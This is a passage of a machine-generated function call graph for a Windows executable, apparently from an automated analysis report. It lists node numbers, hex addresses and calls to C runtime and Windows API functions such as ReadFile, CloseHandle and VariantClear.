417f77 __controlfp_s 46 API calls 87402->87405 87406 41e199 87403->87406 87407 417f9d __dosmaperr 46 API calls 87403->87407 87404->87403 87405->87406 87406->87377 87407->87406 87408->87363 87409->87373 87410->87365 87411->87369 87412->87373 87413->87378 87414->87377 87415->87373 87417 4149ea 87416->87417 87418 4149fe 87416->87418 87462 417f77 46 API calls __getptd_noexit 87417->87462 87420 4149fa 87418->87420 87422 41443c __flush 77 API calls 87418->87422 87434 414ab2 LeaveCriticalSection LeaveCriticalSection __wfsopen 87420->87434 87421 4149ef 87463 417f25 10 API calls __controlfp_s 87421->87463 87423 414a0a 87422->87423 87435 41d8c2 87423->87435 87427 414139 __filbuf 46 API calls 87428 414a18 87427->87428 87439 41d7fe 87428->87439 87430 414a1e 87430->87420 87431 413748 _free 46 API calls 87430->87431 87431->87420 87432->87163 87433->87166 87434->87166 87436 414a12 87435->87436 87437 41d8d2 87435->87437 87436->87427 87437->87436 87438 413748 _free 46 API calls 87437->87438 87438->87436 87440 41d80a type_info::_Type_info_dtor 87439->87440 87441 41d812 87440->87441 87443 41d82d 87440->87443 87479 417f8a 46 API calls __getptd_noexit 87441->87479 87444 41d839 87443->87444 87447 41d873 87443->87447 87481 417f8a 46 API calls __getptd_noexit 87444->87481 87445 41d817 87480 417f77 46 API calls __getptd_noexit 87445->87480 87450 41ae56 ___lock_fhandle 48 API calls 87447->87450 87449 41d83e 87482 417f77 46 API calls __getptd_noexit 87449->87482 87452 41d879 87450->87452 87454 41d893 87452->87454 87455 41d887 87452->87455 87453 41d846 87483 417f25 10 API calls __controlfp_s 87453->87483 87484 417f77 46 API calls __getptd_noexit 87454->87484 87464 41d762 87455->87464 87459 41d81f type_info::_Type_info_dtor 87459->87430 87460 41d88d 87485 41d8ba LeaveCriticalSection __unlock_fhandle 87460->87485 87462->87421 87463->87420 87486 41aded 87464->87486 87466 41d7c8 87499 41ad67 47 API calls 2 library calls 87466->87499 87467 41d772 87467->87466 87468 41d7a6 87467->87468 87470 41aded __chsize_nolock 46 API calls 87467->87470 87468->87466 87471 41aded __chsize_nolock 46 API calls 87468->87471 87473 41d79d 87470->87473 87474 41d7b2 CloseHandle 87471->87474 87472 41d7d0 87475 41d7f2 87472->87475 87500 417f9d 46 API calls 3 library calls 87472->87500 87476 41aded __chsize_nolock 46 API calls 87473->87476 87474->87466 87477 41d7be GetLastError 87474->87477 87475->87460 87476->87468 87477->87466 87479->87445 87480->87459 87481->87449 87482->87453 87483->87459 87484->87460 87485->87459 87487 41ae12 87486->87487 87488 41adfa 87486->87488 87490 417f8a __set_osfhnd 46 API calls 87487->87490 87493 41ae51 87487->87493 87489 417f8a __set_osfhnd 46 API calls 87488->87489 87491 41adff 87489->87491 87492 41ae23 87490->87492 87494 417f77 __controlfp_s 46 API calls 87491->87494 87495 417f77 __controlfp_s 46 API calls 87492->87495 87493->87467 87496 41ae07 87494->87496 87497 41ae2b 87495->87497 87496->87467 87498 417f25 __controlfp_s 10 API calls 87497->87498 87498->87496 87499->87472 87500->87475 87502 414c82 type_info::_Type_info_dtor 87501->87502 87503 414cc3 87502->87503 87504 414c96 __localtime64_s 87502->87504 87505 414cbb type_info::_Type_info_dtor 87502->87505 87506 415471 __lock_file 47 API calls 87503->87506 87528 417f77 46 API calls __getptd_noexit 87504->87528 87505->87172 87508 414ccb 87506->87508 87514 414aba 87508->87514 87509 414cb0 87529 417f25 10 API calls __controlfp_s 87509->87529 87518 414ad8 __localtime64_s 87514->87518 87520 414af2 87514->87520 87515 414ae2 87581 417f77 46 API calls __getptd_noexit 87515->87581 87517 414ae7 87582 417f25 10 API calls __controlfp_s 87517->87582 87518->87515 87518->87520 87523 414b2d 87518->87523 87530 414cfa LeaveCriticalSection LeaveCriticalSection __wfsopen 87520->87530 87522 414c38 __localtime64_s 87584 417f77 46 API calls __getptd_noexit 87522->87584 87523->87520 87523->87522 87524 414139 __filbuf 46 API calls 87523->87524 87531 41dfcc 87523->87531 87561 41d8f3 87523->87561 87583 41e0c2 46 API calls 3 library calls 87523->87583 87524->87523 87528->87509 87529->87505 87530->87505 87532 41dfd8 type_info::_Type_info_dtor 87531->87532 87533 41dfe0 87532->87533 87534 41dffb 87532->87534 87654 417f8a 46 API calls __getptd_noexit 87533->87654 87535 41e007 87534->87535 87540 41e041 87534->87540 87656 417f8a 46 API calls __getptd_noexit 87535->87656 87538 41dfe5 87655 417f77 46 API calls __getptd_noexit 87538->87655 87539 41e00c 87657 417f77 46 API calls __getptd_noexit 87539->87657 87543 41e063 87540->87543 87544 41e04e 87540->87544 87545 41ae56 ___lock_fhandle 48 API calls 87543->87545 87659 417f8a 46 API calls __getptd_noexit 87544->87659 87548 41e069 87545->87548 87546 41e014 87658 417f25 10 API calls __controlfp_s 87546->87658 87550 41e077 87548->87550 87551 41e08b 87548->87551 87549 41e053 87660 417f77 46 API calls __getptd_noexit 87549->87660 87585 41da15 87550->87585 87661 417f77 46 API calls __getptd_noexit 87551->87661 87554 41dfed type_info::_Type_info_dtor 87554->87523 87557 41e083 87663 41e0ba LeaveCriticalSection __unlock_fhandle 87557->87663 87558 41e090 87662 417f8a 46 API calls __getptd_noexit 87558->87662 87562 41d900 87561->87562 87566 41d915 87561->87566 87667 417f77 46 API calls __getptd_noexit 87562->87667 87564 41d905 87668 417f25 10 API calls __controlfp_s 87564->87668 87568 41d94a 87566->87568 87575 41d910 87566->87575 87664 420603 87566->87664 87569 414139 __filbuf 46 API calls 87568->87569 87570 41d95e 87569->87570 87571 41dfcc __read 59 API calls 87570->87571 87572 41d965 87571->87572 87573 414139 __filbuf 46 API calls 87572->87573 87572->87575 87574 41d988 87573->87574 87574->87575 87576 414139 __filbuf 46 API calls 87574->87576 87575->87523 87577 41d994 87576->87577 87577->87575 87578 414139 __filbuf 46 API calls 87577->87578 87579 41d9a1 87578->87579 87580 414139 __filbuf 46 API calls 87579->87580 87580->87575 87581->87517 87582->87520 87583->87523 87584->87517 87586 41da31 87585->87586 87587 41da4c 87585->87587 87588 417f8a __set_osfhnd 46 API calls 87586->87588 87589 41da5b 87587->87589 87591 41da7a 87587->87591 87590 41da36 87588->87590 87592 417f8a __set_osfhnd 46 API calls 87589->87592 87595 417f77 __controlfp_s 46 API calls 87590->87595 87594 41da98 87591->87594 87609 41daac 87591->87609 87593 41da60 87592->87593 87596 417f77 __controlfp_s 46 API calls 87593->87596 87597 417f8a __set_osfhnd 46 API calls 87594->87597 87598 41da3e 87595->87598 87600 41da67 87596->87600 87602 41da9d 87597->87602 87598->87557 87599 41db02 87601 417f8a __set_osfhnd 46 API calls 87599->87601 87603 417f25 __controlfp_s 10 API calls 87600->87603 87604 41db07 87601->87604 87605 417f77 __controlfp_s 46 API calls 87602->87605 87603->87598 87606 417f77 __controlfp_s 46 API calls 87604->87606 87607 41daa4 87605->87607 87606->87607 87611 417f25 __controlfp_s 10 API calls 87607->87611 87608 41dae1 87608->87599 87617 41daec ReadFile 87608->87617 87609->87598 87609->87599 87609->87608 87610 41db1b 87609->87610 87612 416b04 __malloc_crt 46 API calls 87610->87612 87611->87598 87614 41db31 87612->87614 87620 41db59 87614->87620 87621 41db3b 87614->87621 87615 41dc17 87616 41df8f GetLastError 87615->87616 87624 41dc2b 87615->87624 87618 41de16 87616->87618 87619 41df9c 87616->87619 87617->87615 87617->87616 87628 417f9d __dosmaperr 46 API calls 87618->87628 87633 41dd9b 87618->87633 87622 417f77 __controlfp_s 46 API calls 87619->87622 87625 420494 __lseeki64_nolock 48 API calls 87620->87625 87623 417f77 __controlfp_s 46 API calls 87621->87623 87626 41dfa1 87622->87626 87627 41db40 87623->87627 87624->87633 87634 41dc47 87624->87634 87637 41de5b 87624->87637 87629 41db67 87625->87629 87630 417f8a __set_osfhnd 46 API calls 87626->87630 87631 417f8a __set_osfhnd 46 API calls 87627->87631 87628->87633 87629->87617 87630->87633 87631->87598 87632 413748 _free 46 API calls 87632->87598 87633->87598 87633->87632 87635 41dcab ReadFile 87634->87635 87644 41dd28 87634->87644 87638 41dcc9 GetLastError 87635->87638 87647 41dcd3 87635->87647 87636 41ded0 ReadFile 87639 41deef GetLastError 87636->87639 87645 41def9 87636->87645 87637->87633 87637->87636 87638->87634 87638->87647 87639->87637 87639->87645 87640 41ddec MultiByteToWideChar 87640->87633 87641 41de10 GetLastError 87640->87641 87641->87618 87642 41dda3 87650 41dd60 87642->87650 87651 41ddda 87642->87651 87643 41dd96 87646 417f77 __controlfp_s 46 API calls 87643->87646 87644->87633 87644->87642 87644->87643 87644->87650 87645->87637 87649 420494 __lseeki64_nolock 48 API calls 87645->87649 87646->87633 87647->87634 87648 420494 __lseeki64_nolock 48 API calls 87647->87648 87648->87647 87649->87645 87650->87640 87652 420494 __lseeki64_nolock 48 API calls 87651->87652 87653 41dde9 87652->87653 87653->87640 87654->87538 87655->87554 87656->87539 87657->87546 87658->87554 87659->87549 87660->87546 87661->87558 87662->87557 87663->87554 87665 416b04 __malloc_crt 46 API calls 87664->87665 87666 420618 87665->87666 87666->87568 87667->87564 87668->87575 87672 4148b3 GetSystemTimeAsFileTime __aulldiv 87669->87672 87671 442c6b 87671->87175 87672->87671 87673->87182 87674->87188 87675->87188 87677 45272f __tzset_nolock _wcscpy 87676->87677 87678 414d04 61 API calls __fread_nolock 87677->87678 87679 44afef GetSystemTimeAsFileTime 87677->87679 87680 4528a4 87677->87680 87681 4150d1 81 API calls _fseek 87677->87681 87678->87677 87679->87677 87680->87096 87680->87097 87681->87677 87683 44b1bc 87682->87683 87684 44b1ca 87682->87684 87685 4149c2 116 API calls 87683->87685 87686 44b1e1 87684->87686 87687 4149c2 116 API calls 87684->87687 87688 44b1d8 87684->87688 87685->87684 87717 4321a4 87686->87717 87689 44b2db 87687->87689 87688->87125 87689->87686 87691 44b2e9 87689->87691 87695 44b2f6 87691->87695 87697 414a46 __fcloseall 82 API calls 87691->87697 87692 44b224 87693 44b253 87692->87693 87694 44b228 87692->87694 87721 43213d 87693->87721 87696 44b235 87694->87696 87699 414a46 __fcloseall 82 API calls 87694->87699 87695->87125 87700 44b245 87696->87700 87702 414a46 __fcloseall 82 API calls 87696->87702 87697->87695 87699->87696 87700->87125 87701 44b25a 87703 44b260 87701->87703 87704 44b289 87701->87704 87702->87700 87706 44b26d 87703->87706 87709 414a46 __fcloseall 82 API calls 87703->87709 87731 44b0bf 87 API calls 87704->87731 87707 44b27d 87706->87707 87710 414a46 __fcloseall 82 API calls 87706->87710 87707->87125 87708 44b28f 87732 4320f8 46 API calls _free 87708->87732 87709->87706 87710->87707 87712 44b295 87713 44b2a2 87712->87713 87714 414a46 __fcloseall 82 API calls 87712->87714 87715 44b2b2 87713->87715 87716 414a46 __fcloseall 82 API calls 87713->87716 87714->87713 87715->87125 87716->87715 87718 4321cb 87717->87718 87720 4321b4 __tzset_nolock _memmove 87717->87720 87719 414d04 __fread_nolock 61 API calls 87718->87719 87719->87720 87720->87692 87722 4135bb _malloc 46 API calls 87721->87722 87723 432150 87722->87723 87724 4135bb _malloc 46 API calls 87723->87724 87725 432162 87724->87725 87726 4135bb _malloc 46 API calls 87725->87726 87727 432174 87726->87727 87729 432189 87727->87729 87733 4320f8 46 API calls _free 87727->87733 87729->87701 87730 432198 87730->87701 87731->87708 87732->87712 87733->87730 87734->87014 87735->87015 87736->87034 87737->87034 87738->87034 87739->87026 87740->87034 87741->87034 87742->87039 87743->87049 87744->87048 87745->87048 87747 40e959 87746->87747 87751 40e84f 87746->87751 87748 408f40 VariantClear 87747->87748 87749 40e95e 87748->87749 87750 4115d7 52 API calls 87749->87750 87750->87751 87751->87056 87751->87058 87752->87056 87802 410160 87753->87802 87755 41012f GetFullPathNameW 87756 410147 moneypunct 87755->87756 87756->86870 87758 4102cb SHGetDesktopFolder 87757->87758 87761 410333 _wcsncpy 87757->87761 87759 4102e0 _wcsncpy 87758->87759 87758->87761 87760 41031c SHGetPathFromIDListW 87759->87760 87759->87761 87760->87761 87761->86873 87763 4101bb 87762->87763 87770 425f4a 87762->87770 87764 410160 52 API calls 87763->87764 87765 4101c7 87764->87765 87806 410200 52 API calls 2 library calls 87765->87806 87766 4114ab __wcsicoll 58 API calls 87766->87770 87768 4101d6 87807 410200 52 API calls 2 library calls 87768->87807 87769 425f6e 87769->86875 87770->87766 87770->87769 87772 4101e9 87772->86875 87774 40f760 128 API calls 87773->87774 87775 40f584 87774->87775 87776 429335 87775->87776 87777 40f58c 87775->87777 87780 4528bd 118 API calls 87776->87780 87778 40f598 87777->87778 87779 429358 87777->87779 87818 4033c0 113 API calls 7 library calls 87778->87818 87819 434034 86 API calls _wprintf 87779->87819 87783 42934b 87780->87783 87786 429373 87783->87786 87787 42934f 87783->87787 87784 429369 87784->87786 87785 40f5b4 87785->86872 87788 4115d7 52 API calls 87786->87788 87789 431e58 82 API calls 87787->87789 87801 4293c5 moneypunct 87788->87801 87789->87779 87790 42959c 87791 413748 _free 46 API calls 87790->87791 87792 4295a5 87791->87792 87793 431e58 82 API calls 87792->87793 87794 4295b1 87793->87794 87798 401b10 52 API calls 87798->87801 87801->87790 87801->87798 87808 444af8 87801->87808 87811 44b41c 87801->87811 87820 44c7dd 64 API calls 3 library calls 87801->87820 87821 402780 87801->87821 87829 4022d0 52 API calls moneypunct 87801->87829 87803 410167 _wcslen 87802->87803 87804 4115d7 52 API calls 87803->87804 87805 41017e _wcscpy 87804->87805 87805->87755 87806->87768 87807->87772 87809 4115d7 52 API calls 87808->87809 87810 444b27 _memmove 87809->87810 87810->87801 87812 44b429 87811->87812 87813 4115d7 52 API calls 87812->87813 87814 44b440 87813->87814 87815 44b45e 87814->87815 87816 401b10 52 API calls 87814->87816 87815->87801 87817 44b453 87816->87817 87817->87801 87818->87785 87819->87784 87820->87801 87823 402827 87821->87823 87827 402790 moneypunct _memmove 87821->87827 87822 4115d7 52 API calls 87825 402797 87822->87825 87824 4115d7 52 API calls 87823->87824 87824->87827 87826 4115d7 52 API calls 87825->87826 87828 4027bd 87825->87828 87826->87828 87827->87822 87828->87801 87829->87801 87831 402417 87830->87831 87836 402539 moneypunct 87830->87836 87832 4115d7 52 API calls 87831->87832 87831->87836 87833 402443 87832->87833 87834 4115d7 52 API calls 87833->87834 87835 4024b4 87834->87835 87835->87836 87859 402880 95 API calls 2 library calls 87835->87859 87860 4022d0 52 API calls moneypunct 87835->87860 87836->86879 87844 401566 87839->87844 87840 401794 87861 40e9a0 90 API calls 87840->87861 87843 4010a0 52 API calls 87843->87844 87844->87840 87844->87843 87845 40167a 87844->87845 87846 4017c0 87845->87846 87862 45e737 90 API calls 3 library calls 87845->87862 87846->86881 87848 40bc70 52 API calls 87847->87848 87857 40d451 87848->87857 87849 40d50f 87865 410600 52 API calls 87849->87865 87851 427c01 87866 45e737 90 API calls 3 library calls 87851->87866 87852 40e0a0 52 API calls 87852->87857 87854 401b10 52 API calls 87854->87857 87855 40d519 87855->86884 87857->87849 87857->87851 87857->87852 87857->87854 87857->87855 87863 40f310 53 API calls 87857->87863 87864 40d860 91 API calls 87857->87864 87859->87835 87860->87835 87861->87845 87862->87846 87863->87857 87864->87857 87865->87855 87866->87855 87867->86897 87868->86898 87870 42c5fe 87869->87870 87885 4091c6 87869->87885 87871 40bc70 52 API calls 87870->87871 87870->87885 87872 42c64e InterlockedIncrement 87871->87872 87873 42c665 87872->87873 87878 42c697 87872->87878 87875 42c672 InterlockedDecrement Sleep InterlockedIncrement 87873->87875 87873->87878 87874 42c737 InterlockedDecrement 87876 42c74a 87874->87876 87875->87873 87875->87878 87879 408f40 VariantClear 87876->87879 87877 42c731 87877->87874 87878->87874 87878->87877 88162 408e80 87878->88162 87881 42c752 87879->87881 88175 410c60 87881->88175 87885->86960 87886 42c6db 87887 402160 52 API calls 87886->87887 87888 42c6e5 87887->87888 87889 45340c 85 API calls 87888->87889 87890 42c6f1 87889->87890 88172 40d200 52 API calls 2 library calls 87890->88172 87892 42c6fb 88173 465124 53 API calls 87892->88173 87894 42c715 87895 42c76a 87894->87895 87896 42c719 87894->87896 87897 401b10 52 API calls 87895->87897 88174 46fe32 VariantClear 87896->88174 87899 42c77e 87897->87899 87900 401980 53 API calls 87899->87900 87906 42c796 87900->87906 87901 42c812 88186 46fe32 VariantClear 87901->88186 87903 42c82a InterlockedDecrement 88187 46ff07 54 API calls 87903->88187 87905 42c864 88188 45e737 90 API calls 3 library calls 87905->88188 87906->87901 87906->87905 88180 40ba10 87906->88180 87916 408f40 VariantClear 87918 42c891 87916->87918 87920 410c60 VariantClear 87918->87920 87920->87885 87923 42c849 87924 42c874 87924->87916 87926 42ca59 87924->87926 87926->87926 87928 40afc4 87927->87928 87929 40b156 87927->87929 87930 40afd5 87928->87930 87931 42d1e3 87928->87931 88245 45e737 90 API calls 3 library calls 87929->88245 87935 40a780 197 API calls 87930->87935 87937 40b11a moneypunct 87930->87937 88246 45e737 90 API calls 3 library calls 87931->88246 87934 42d1f8 87941 408f40 VariantClear 87934->87941 87938 40b00a 87935->87938 87936 40b143 87936->86960 87937->87936 88249 45e737 90 API calls 3 library calls 87937->88249 87938->87934 87942 40b012 87938->87942 87940 42d4db 87940->87940 87941->87936 87943 40b04a 87942->87943 87944 40b094 moneypunct 87942->87944 87945 42d231 VariantClear 87942->87945 87948 40b05c moneypunct 87943->87948 88247 40e270 VariantClear moneypunct 87943->88247 87946 40b108 87944->87946 87947 42d425 moneypunct 87944->87947 87945->87948 87946->87937 88248 40e270 VariantClear moneypunct 87946->88248 87947->87937 87949 42d45a VariantClear 87947->87949 87948->87944 87952 4115d7 52 API calls 87948->87952 87949->87937 87952->87944 87954 408fff 87953->87954 87967 40900d 87953->87967 88296 403ea0 52 API calls __cinit 87954->88296 87957 42c3f6 88299 45e737 90 API calls 3 library calls 87957->88299 87959 40a780 197 API calls 87959->87967 87960 4090f2 moneypunct 87960->86960 87961 42c44a 88301 45e737 90 API calls 3 library calls 87961->88301 87962 42c47b 88302 451b42 61 API calls 87962->88302 87965 42c564 87970 408f40 VariantClear 87965->87970 87967->87957 87967->87959 87967->87960 87967->87961 87967->87962 87967->87965 87968 42c4cb 87967->87968 87974 4090df 87967->87974 87976 42c528 87967->87976 87977 409112 87967->87977 87978 42c548 87967->87978 87980 4090ea 87967->87980 88298 4534e3 52 API calls 87967->88298 88300 40c4e0 197 API calls 87967->88300 88250 47faae 87968->88250 87970->87960 87971 42c491 87971->87960 88303 45e737 90 API calls 3 library calls 87971->88303 87972 42c4da 87972->87960 88304 45e737 90 API calls 3 library calls 87972->88304 87974->87980 87981 408e80 VariantClear 87974->87981 88305 45e737 90 API calls 3 library calls 87976->88305 87977->87978 87983 40912b 87977->87983 88306 45e737 90 API calls 3 library calls 87978->88306 87984 408f40 VariantClear 87980->87984 87981->87980 87983->87960 88297 403e10 53 API calls 87983->88297 87984->87960 87986 40914b 87987 408f40 VariantClear 87986->87987 87987->87960 88493 408d90 87988->88493 87990 429778 87991 410c60 VariantClear 87990->87991 87992 429780 87991->87992 87993 408cf9 87993->87990 87994 42976c 87993->87994 87996 408d2d 87993->87996 88518 45e737 90 API calls 3 library calls 87994->88518 88509 403d10 87996->88509 87999 408d71 moneypunct 87999->86960 88000 408f40 VariantClear 88001 408d45 moneypunct 88000->88001 88001->87999 88001->88000 88003 425c87 88002->88003 88006 40d15f 88002->88006 88004 425cc7 88003->88004 88005 425ca1 TranslateAcceleratorW 88003->88005 88005->88006 88006->86960 88008 42602f 88007->88008 88011 40d17f 88007->88011 88008->86960 88009 42608e IsDialogMessageW 88010 40d18c 88009->88010 88009->88011 88010->86960 88011->88009 88011->88010 88729 430c46 GetClassLongW 88011->88729 88014 4096c6 _wcslen 88013->88014 88015 4115d7 52 API calls 88014->88015 88075 40a70c moneypunct _memmove 88014->88075 88016 4096fa _memmove 88015->88016 88017 4115d7 52 API calls 88016->88017 88019 40971b 88017->88019 88018 4013a0 52 API calls 88020 4297aa 88018->88020 88021 409749 CharUpperBuffW 88019->88021 88025 40976a moneypunct 88019->88025 88019->88075 88022 4115d7 52 API calls 88020->88022 88021->88025 88064 4297d1 _memmove 88022->88064 88071 4097e5 moneypunct 88025->88071 88731 47dcbb 199 API calls 88025->88731 88026 408f40 VariantClear 88027 42ae92 88026->88027 88028 410c60 VariantClear 88027->88028 88029 42aea4 88028->88029 88030 409aa2 88032 4115d7 52 API calls 88030->88032 88037 409afe 88030->88037 88030->88064 88031 40a689 88034 4115d7 52 API calls 88031->88034 88032->88037 88033 4115d7 52 API calls 88033->88071 88054 40a6af moneypunct _memmove 88034->88054 88035 409b2a 88039 429dbe 88035->88039 88105 409b4d moneypunct _memmove 88035->88105 88737 40b400 VariantClear VariantClear moneypunct 88035->88737 88036 40c2c0 52 API calls 88036->88071 88037->88035 88038 4115d7 52 API calls 88037->88038 88040 429d31 88038->88040 88041 429dd3 88039->88041 88738 40b400 VariantClear VariantClear moneypunct 88039->88738 88045 429d42 88040->88045 88734 44a801 52 API calls 88040->88734 88060 40e1c0 VariantClear 88041->88060 88041->88105 88042 429a46 VariantClear 88042->88071 88043 409fd2 88046 40a045 88043->88046 88099 42a3f5 88043->88099 88052 40e0a0 52 API calls 88045->88052 88050 4115d7 52 API calls 88046->88050 88047 408f40 VariantClear 88047->88071 88056 40a04c 88050->88056 88057 429d57 88052->88057 88061 4115d7 52 API calls 88054->88061 88062 40a0a7 88056->88062 88066 4091e0 314 API calls 88056->88066 88735 453443 52 API calls 88057->88735 88058 40ba10 52 API calls 88058->88071 88059 42a42f 88742 45e737 90 API calls 3 library calls 88059->88742 88060->88105 88061->88075 88085 40a0af 88062->88085 88743 40c790 VariantClear moneypunct 88062->88743 88063 4299d9 88067 408f40 VariantClear 88063->88067 88754 45e737 90 API calls 3 library calls 88064->88754 88066->88062 88070 4299e2 88067->88070 88068 429abd 88068->86960 88069 429d88 88736 453443 52 API calls 88069->88736 88082 410c60 VariantClear 88070->88082 88071->88030 88071->88031 88071->88033 88071->88036 88071->88042 88071->88047 88071->88054 88071->88058 88071->88063 88071->88064 88071->88068 88077 40a780 197 API calls 88071->88077 88078 42a452 88071->88078 88732 40c4e0 197 API calls 88071->88732 88733 40e270 VariantClear moneypunct 88071->88733 88075->88018 88077->88071 88078->88026 88080 4115d7 52 API calls 88080->88105 88081 44a801 52 API calls 88081->88105 88136 40a650 moneypunct 88082->88136 88083 408f40 VariantClear 88113 40a162 moneypunct _memmove 88083->88113 88084 402780 52 API calls 88084->88105 88086 40a11b 88085->88086 88087 42a4b4 VariantClear 88085->88087 88085->88113 88093 40a12d moneypunct 88086->88093 88744 40e270 VariantClear moneypunct 88086->88744 88087->88093 88088 40a780 197 API calls 88088->88105 88089 408e80 VariantClear 88089->88105 88091 401980 53 API calls 88091->88105 88092 4115d7 52 API calls 88092->88113 88093->88092 88093->88113 88095 408e80 VariantClear 88095->88113 88096 42a74d VariantClear 88096->88113 88097 41130a 51 API calls __cinit 88097->88105 88098 40a368 88100 42aad4 88098->88100 88108 40a397 88098->88108 88741 47390f VariantClear 88099->88741 88747 46fe90 VariantClear VariantClear moneypunct 88100->88747 88101 42a886 VariantClear 88101->88113 88102 42a7e4 VariantClear 88102->88113 88104 409c95 88104->86960 88105->88043 88105->88059 88105->88075 88105->88080 88105->88081 88105->88084 88105->88088 88105->88089 88105->88091 88105->88097 88105->88099 88105->88104 88739 45f508 52 API calls 88105->88739 88740 403e10 53 API calls 88105->88740 88106 40a3ce 88117 40a3d9 moneypunct 88106->88117 88748 40b400 VariantClear VariantClear moneypunct 88106->88748 88107 40e270 VariantClear 88107->88113 88108->88106 88133 40a42c moneypunct 88108->88133 88730 40b400 VariantClear VariantClear moneypunct 88108->88730 88111 42abaf 88115 42abd4 VariantClear 88111->88115 88124 40a4ee moneypunct 88111->88124 88112 4115d7 52 API calls 88116 42a5a6 VariantInit VariantCopy 88112->88116 88113->88083 88113->88095 88113->88096 88113->88098 88113->88100 88113->88101 88113->88102 88113->88107 88113->88112 88120 4115d7 52 API calls 88113->88120 88745 470870 52 API calls 88113->88745 88746 44ccf1 VariantClear moneypunct 88113->88746 88114 40a4dc 88114->88124 88750 40e270 VariantClear moneypunct 88114->88750 88115->88124 88116->88113 88119 42a5c6 VariantClear 88116->88119 88118 40a41a 88117->88118 88126 42ab44 VariantClear 88117->88126 88117->88133 88118->88133 88749 40e270 VariantClear moneypunct 88118->88749 88119->88113 88120->88113 88121 42ac4f 88127 42ac79 VariantClear 88121->88127 88131 40a546 moneypunct 88121->88131 88124->88121 88125 40a534 88124->88125 88125->88131 88751 40e270 VariantClear moneypunct 88125->88751 88126->88133 88127->88131 88128 42ad28 88134 42ad4e VariantClear 88128->88134 88139 40a583 moneypunct 88128->88139 88131->88128 88132 40a571 88131->88132 88132->88139 88752 40e270 VariantClear moneypunct 88132->88752 88133->88111 88133->88114 88134->88139 88136->86960 88137 42ae0e VariantClear 88137->88139 88139->88136 88139->88137 88753 40e270 VariantClear moneypunct 88139->88753 88140->86960 88141->86908 88142->86913 88143->86960 88144->86960 88145->86960 88146->86960 88147->86965 88148->86965 88149->86965 88150->86965 88151->86965 88152->86965 88153->86965 88155 403cdf 88154->88155 88156 408f40 VariantClear 88155->88156 88157 403ce7 88156->88157 88157->86953 88158->86965 88159->86965 88160->86960 88161->86905 88163 408e88 88162->88163 88165 408e94 88162->88165 88164 408f40 VariantClear 88163->88164 88164->88165 88166 45340c 88165->88166 88167 453439 88166->88167 88168 453419 88166->88168 88167->87886 88169 45342f 88168->88169 88232 4531b1 85 API calls 5 library calls 88168->88232 88169->87886 88171 453425 88171->87886 88172->87892 88173->87894 88174->87877 88176 428372 88175->88176 88177 410c73 moneypunct 88175->88177 88179 42838c 88176->88179 88233 40e1c0 88176->88233 88177->87885 88181 40ba49 88180->88181 88182 40ba1b moneypunct _memmove 88180->88182 88184 4115d7 52 API calls 88181->88184 88183 4115d7 52 API calls 88182->88183 88185 40ba22 88183->88185 88184->88182 88185->87906 88186->87903 88187->87923 88188->87924 88232->88171 88234 408f40 VariantClear 88233->88234 88235 40e1cb moneypunct 88234->88235 88235->88176 88245->87931 88246->87934 88247->87948 88248->87937 88249->87940 88251 408e80 VariantClear 88250->88251 88284 47fb02 88251->88284 88254 47fc59 88255 40a780 197 API calls 88254->88255 88258 47fc6a 88255->88258 88256 47fc2b 88259 408f40 VariantClear 88256->88259 88258->88256 88261 47fc7d 88258->88261 88262 47fc8c 88258->88262 88260 47fc33 88259->88260 88264 408f40 VariantClear 88260->88264 88348 45e737 90 API calls 3 library calls 88261->88348 88266 40ba10 52 API calls 88262->88266 88263 408f40 VariantClear 88263->88284 88267 47fc3b 88264->88267 88269 47fc98 88266->88269 88268 408f40 VariantClear 88267->88268 88270 47fc43 88268->88270 88349 47b2f4 144 API calls 88269->88349 88273 410c60 VariantClear 88270->88273 88272 47fcd4 88278 408f40 VariantClear 88272->88278 88277 47fc4b 88273->88277 88274 47fca7 88275 408f40 VariantClear 88274->88275 88279 47fcb1 88275->88279 88276 408e80 VariantClear 88276->88284 88277->87972 88280 47fcdc 88278->88280 88281 408f40 VariantClear 88279->88281 88282 408f40 VariantClear 88280->88282 88283 47fcb9 88281->88283 88285 47fce4 88282->88285 88286 408f40 VariantClear 88283->88286 88284->88254 88284->88256 88284->88263 88284->88272 88284->88276 88291 47fc1d 88284->88291 88307 475a67 88284->88307 88335 47b291 88284->88335 88346 46fe32 VariantClear 88284->88346 88287 408f40 VariantClear 88285->88287 88288 47fcc1 88286->88288 88289 47fcec 88287->88289 88290 410c60 VariantClear 88288->88290 88292 410c60 VariantClear 88289->88292 88294 47fcc9 88290->88294 88347 45e538 90 API calls 3 library calls 88291->88347 88293 47fcf4 88292->88293 88293->87972 88294->87972 88296->87967 88297->87986 88298->87967 88299->87960 88300->87967 88301->87960 88302->87971 88303->87960 88304->87960 88305->87960 88306->87965 88308 475ae5 88307->88308 88312 475ac5 88307->88312 88350 45e737 90 API calls 3 library calls 88308->88350 88310 475afe 88311 408f40 VariantClear 88310->88311 88313 475b06 88311->88313 88312->88308 88314 475b42 88312->88314 88315 402780 52 API calls 88312->88315 88313->88284 88316 402780 52 API calls 88314->88316 88315->88312 88326 475b60 88316->88326 88317 475c7c 88318 408f40 VariantClear 88317->88318 88321 475c84 88318->88321 88319 40c2c0 52 API calls 88319->88326 88320 40a780 197 API calls 88320->88326 88321->88284 88322 475cc7 88324 408f40 VariantClear 88322->88324 88323 40ba10 52 API calls 88323->88326 88329 475ca8 88324->88329 88325 408f40 VariantClear 88325->88326 88326->88317 88326->88319 88326->88320 88326->88322 88326->88323 88326->88325 88327 475cd5 88326->88327 88333 475ca0 88326->88333 88351 40c4e0 197 API calls 88326->88351 88352 45e737 90 API calls 3 library calls 88327->88352 88329->88284 88331 475ce8 88332 408f40 VariantClear 88331->88332 88332->88329 88334 408f40 VariantClear 88333->88334 88334->88329 88336 47b2e7 88335->88336 88337 47b2a5 88335->88337 88336->88284 88353 40e710 88337->88353 88340 47b2b7 88364 47974b 88340->88364 88341 47b2cf 88342 47974b 144 API calls 88341->88342 88345 47b2df 88342->88345 88344 47b2c7 88344->88284 88345->88284 88346->88284 88347->88256 88348->88256 88349->88274 88350->88310 88351->88326 88352->88331 88354 408f40 VariantClear 88353->88354 88355 40e71b 88354->88355 88356 4115d7 52 API calls 88355->88356 88357 40e729 88356->88357 88358 40e734 88357->88358 88359 426bdc 88357->88359 88360 401b10 52 API calls 88358->88360 88363 426be7 88358->88363 88361 40bc70 52 API calls 88359->88361 88359->88363 88362 40e743 88360->88362 88361->88363 88362->88340 88362->88341 88365 479786 88364->88365 88366 479aed 88364->88366 88365->88366 88368 479798 88365->88368 88433 451b42 61 API calls 88366->88433 88370 4797a2 88368->88370 88371 4797be 88368->88371 88369 479b00 88369->88344 